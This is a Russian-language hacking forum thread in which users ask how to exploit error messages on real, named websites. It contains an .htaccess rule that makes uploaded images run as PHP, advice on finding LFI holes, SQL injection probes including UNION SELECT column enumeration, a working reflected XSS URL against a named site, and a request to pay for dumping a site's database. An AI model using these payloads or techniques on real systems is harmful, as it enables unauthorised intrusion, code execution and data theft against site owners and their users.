Поймите, что когда вы заливаете картинку, она не будет работать сама, ну не будет, понимаете. Нужно ее проинклюдить где-то. Ну или перезаписать .htaccess.
странные ошибки Можем ли мы получить "table_name" от этой ошибки? http://www.icedtime.com/search?gender=[men,women,unisex]&price=[0,1000000]&categories=[7700'] SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and 1=2)' at line 1
Для инклюда нужен бажный скрипт на сайти, надо найти уязвимость типа LFI. О них много рассказано на форуме, примеры есть в теме РНР-инъекции. Хтаксесс можно перезаписать/записать путем заливки файла с таким именем и добавления чего-то вроде AddType application/x-httpd-php .gif
при кавычке выдает Warning: getimagesize(discograf/51\'/say_face_01.jpg): failed to open stream: No such file or directory in /home/vitasco3/public_html/adm/disco/class_disko.php on line 335 пытаюсь подставить логическую операцию выдает тоже самое. уязвимость ли это и можно ли ее раскрутить?
Вы бы сперва хоть ознокомились с php, sql а потом что то делали. толку от того что вы суете везде ковычки. перед вами ошибка в которой все описанно. нету там иньекции. единственно что вот xss Code: http://www.vitas.com.ru/diskograf.php?id=12%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3C%22
что дает эта ошибка, кроме раскрытия путей? Fatal error: Uncaught exception 'E_NOTICE' with message 'Undefined variable: text_block' in [path]:62 Stack trace: #0 [path](62): PHP_Exceptionizer_Catcher->handler(8, 'Undefined varia...', '[path]', 62, Array) #1 /[path](4): require_once('[path]') #2 {main} thrown in [path] on line 62
Нашол 90 уязвимостей Уязвимости для sql injecion, нужно скачать весь сайт с базой и скриптами.Подскажите как или за отдельную плату можете это сделать? Сайт lbss.lv
www.blabla.com/posting.php?mode=post&f='&sid=1d83ba1228e6ef2a1f3e4ea8afc88e88 показывает: Warning: strtr() [function.strtr]: The second argument is not an array in /home/mastery/blabla.com/includes/session.php on line 2184 Fatal error: template->_tpl_load_file(): File /message_body.html does not exist or is empty in /home/mastery/blabla.com/includes/functions_template.php on line 63 пошарил античат,гугл,хакер ру,начал перебирать +unon+select+1,2,3 www.blabla.com/posting.php?mode=post&f='&sid=-1d83ba1228e6ef2a1f3e4ea8afc88e88+unon+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30 дошел до 30 безрезультатно.показывает все тоже сообшениею.обьясните плиз может что то не так делаю???и как надо делать
